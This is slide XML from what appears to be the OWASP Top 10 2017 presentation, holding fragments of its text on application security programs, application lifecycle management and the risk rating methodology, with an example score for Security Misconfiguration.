                  <a:spcPct val="15000"/>
                </a:spcAf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get to where the essential security of all your applications and APIs is verified continuously.</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="Freeform 14"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="196158" y="6017867"/>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rPr>
                <a:t>Achieving Coverage</a:t>
              </a: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 and Accuracy</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129115"/>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82800" bIns="161562" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="0" lvl="1" algn="l" defTabSz="444500" rtl="0">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="15000"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <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rPr>
                <a:t>No matter how good</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in the tools development teams are already using, not PDF files.</a:t>
              </a:r>
              <a:endPar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Freeform 16"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="192845" y="7032486"/>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Make Findings Awesome</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Tree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16893207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633150053"/>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5543">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Start</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" baseline="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> Your Application Security Program Now</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="F9FBFD"/>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81785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a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Applica</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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00" baseline="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>in production, many organizations are struggling to get a handle on the enormous volume of vulnerabilities. </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US">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a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>OWASP recommends organizations establish an application security program to gain insight and improve security across their app and API portfolio.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Key activities include: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chemeClr val="tx2"/>
                        </a:solidFill>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8" name="Text Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:solidFill>
            <a:srgbClr val="83276B"/>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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>What’s Next for Organizations</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="12" name="Diagram 11"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2794381691"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="-914400" y="2743200"/>
          <a:ext cx="8686800" cy="6096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662246814"/>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5366">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" baseline="0" dirty="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Manage the full Application Lifecycle</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="F9FBFD"/>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818034">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-AU"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Applications are some of the most complex systems humans regularly create and maintain. IT management for an application should be performed by IT specialists who are responsible for the overall IT lifecycle of an application.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="600"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-AU" sz="90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We </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-AU"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suggest establishing application owners and application managers for every application to provide accountability, responsibility, consulted and informed (RACI), to ensure the organization who can sign off risks, and who is responsible for security design, building, testing and deploying application security</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-AU" sz="900" b="0" kern="1200" dirty="0" smtClean="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t>
                      </a:r>
                      <a:endParaRPr lang="en-AU"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8" name="Text Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:solidFill>
            <a:srgbClr val="83276B"/>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a:t>+A</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Title 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>What’s Next for</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Application Managers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="12" name="Diagram 11"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3978474574"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="-39815" y="2133600"/>
          <a:ext cx="6934200" cy="6934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025672143"/>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5543">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>It’s About</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" baseline="0" dirty="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t> Risks, Not Weaknesses</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81785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Although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2007</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earlier versions of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rPr>
                        <a:t>OWASP Top 10</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focused on identifying the most prevalent “vulnerabilities,” the OWASP Top 10 has always been organized around risks. This focus on risks has caused some understandable confusion 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the part of people searching for an airtight weakness taxonomy.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6"/>
                        </a:rPr>
                        <a:t>OWASP Top 10 for</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6"/>
                        </a:rPr>
                        <a:t> 2010</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clarified</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the risk-focus in the Top 10 by being very explicit about how threat agents, attack vectors, weaknesses, technical impacts, and business impacts combine to produce risks. This version of the OWASP Top 10 continues to follow the same methodology.</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Risk Rating methodology for the Top 10 is based on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7"/>
                        </a:rPr>
                        <a:t>OWASP Risk Rating Methodology</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each Top 10 item, we estimated the typical risk that each weakness introduces to a typical web application by looking at common likelihood factors and impact factors for each common weakness. We then rank ordered the Top 10 according to those weaknesses that typically introduce the most significant risk to an application. These factors get updated with each new Top 10 release as things change.</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7"/>
                        </a:rPr>
                        <a:t>OWASP Risk Rating Methodology</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defines numerous factors to help calculate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the risk of an identified vulnerability. However, the Top 10 must talk about generalities, rather than specific vulnerabilities in real applications and APIs. Consequently, we can never be as precise as system owners can be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Our methodology includes three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likelihood factors for each</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weakness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prevalence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detectability,</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ease of exploit</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one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impact factor (technical impact).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prevalence of a weakness is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 factor that you typically don’t have to calculate. For prevalence data, we have been supplied prevalence statistics from a number of different organizations (as referenced in the Attribution section on page 4) and we have averaged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Top 10 (the higher the result the higher the risk).  </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Note that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Your organization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will have to decide how much security risk from applications and APIs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the organization</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The following illustrates our calculation of the risk for </a:t>
                      </a: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rPr>
                        <a:t>A6:2017-Security Misconfiguration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93938440"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="121920" y="6324600"/>
          <a:ext cx="6629400" cy="2606453"/>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xmlns="" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1104900">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1104900">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1104900">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20003"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1104900">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20004"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1104900">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20005"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="625253">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491782">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>App</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="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a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Exploitability</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>EASY</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Prevalence</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>WIDESPREAD</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Detectability</a:t>
                      </a:r>
                    </a:p>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EASY</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en-US" sz="1000" b="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Technical</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" baseline="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>MODERATE</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1000" b="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>App / Business</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="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1"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1489418">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>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400" b="1" kern="0" baseline="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" b="1" kern="0" baseline="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>3</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2400" b="1" kern="0" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2"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1800" b="1" kern="0" baseline="0">
                          <a:solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>Average=</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" kern="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t/>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" kern="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" kern="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t/>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" kern="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="1" kern="0" baseline="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" b="1" kern="0" baseline="0">
                          <a:solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>3.0</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2400" b="1" kern="0" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="00B050"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2"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1200"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="20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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>*</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2400" b="1" kern="0" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2"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rgbClr val="00000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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>2</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2400" b="1" kern="0" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2"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xmlns="" val="10002"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Rectangle 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3505200" y="8545588"/>
            <a:ext cx="1028819" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>= 6.0</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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solidFill>
            <a:srgbClr val="83276B"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE"/>
              <a:t>+R</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Titel 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Note About Risks</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="30" name="Gruppieren 29"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="76200" y="6451798"/>
            <a:ext cx="5897010" cy="390006"/>
            <a:chOff x="-29610" y="1058047"/>
            <a:chExt cx="5897010" cy="390006"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="31" name="Group 40"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="-29610" y="1058047"/>
              <a:ext cx="5897010" cy="386519"/>
              <a:chOff x="-29610" y="1070390"/>
              <a:chExt cx="58970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29610" y="1073624"/>
                <a:ext cx="575799" cy="29751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40" name="AutoShape 140"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
                <a:stCxn id="38" idx="3"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="202779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pic>
        <p:nvPicPr>
          <p:cNvPr id="26" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{105A35D7-3B85-4A53-AF32-58A83A690AE3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8" cstate="print">
            <a:clrChange>
              <a:clrFrom>
                <a:srgbClr val="FFFFFF"/>
              </a:clrFrom>
              <a:clrTo>
                <a:srgbClr val="FFFFFF">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:clrTo>
            </a:clrChange>
          </a:blip>
          <a:srcRect t="34128" r="22830" b="30544"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1752600" y="7696200"/>
            <a:ext cx="2322514" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="27" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{4327DDFD-3A4D-4FEC-9751-B8F70C80FFBF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8" cstate="print">
            <a:clrChange>
              <a:clrFrom>
                <a:srgbClr val="FFFFFF"/>
              </a:clrFrom>
              <a:clrTo>
                <a:srgbClr val="FFFFFF">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:clrTo>
            </a:clrChange>
          </a:blip>
          <a:srcRect t="34128" r="22830" b="30544"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2859086" y="8229600"/>
            <a:ext cx="2322514" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>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14370466"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="990600"/>
          <a:ext cx="6858000" cy="128683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4800">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Top 10 Risk Factor Summary</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>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9515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a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>The following table presents a summary of the 2017 Top 10 Application Security Risks, and the risk factors we have assigned to each risk. These factors were determined based on the available</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> statistics and the experience of the OWASP Top 10 team</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>. To</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
